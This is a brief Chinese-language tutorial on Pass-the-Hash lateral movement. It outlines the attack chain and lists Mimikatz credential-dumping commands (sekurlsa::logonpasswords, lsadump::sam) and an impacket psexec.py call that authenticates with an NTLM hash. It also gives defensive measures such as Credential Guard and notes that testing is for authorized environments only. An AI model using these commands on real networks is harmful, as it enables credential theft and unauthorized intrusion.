内网渗透横向移动Pass-the-Hash实战Pass-the-Hash 横向移动实战:Mimikatz 获取 Hash、psexec/sekurlsa/secretsdump、域横向移动。写在前面:合法学习边界Pass-the-Hash 攻击只在授权测试环境进行。一、Pass-the-Hash 攻击链1 ① 获取 Hash → ② Pass-the-Hash → ③ 控制目标主机 → ④ 继续横向移动 二、常用工具1 2 3 4 5 6 # Mimikatz 获取 Hash sekurlsa::logonpasswords lsadump::sam # Pass-the-Hash psexec.py domain/user@target -hashes :NTLMHASH 三、防御加固1 2 3 4 启用 Credential Guard 强制网络登录身份验证 监控异常凭据使用 限制管理员远程登录 四、小结Pass-the-Hash 是横向移动的核心技术。Credential Guard + 网络登录认证是防御核心。